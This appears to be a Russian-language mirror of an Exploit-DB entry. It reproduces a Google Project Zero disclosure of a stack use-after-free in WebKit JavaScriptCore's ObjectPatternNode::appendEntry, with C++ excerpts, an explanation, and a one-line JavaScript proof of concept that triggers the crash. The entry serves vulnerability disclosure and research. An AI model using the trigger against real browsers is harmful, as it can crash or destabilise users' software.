- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 42377
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- N/A
- Дата публикации
- 2017-07-25
WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free
Код:
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1256
Here's a snippet of ObjectPatternNode::appendEntry.
void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}
Here's the definition of Entry.
struct Entry {
const Identifier& propertyName;
ExpressionNode* propertyExpression;
bool wasString;
DestructuringPatternNode* pattern;
ExpressionNode* defaultValue;
BindingType bindingType;
};
The Identifier object created by "Identifier()" is in the stack. So it will get freed in the end of the appendEntry method.
PoC:
var {[a]: b, ...[]} = {};- Источник
- www.exploit-db.com
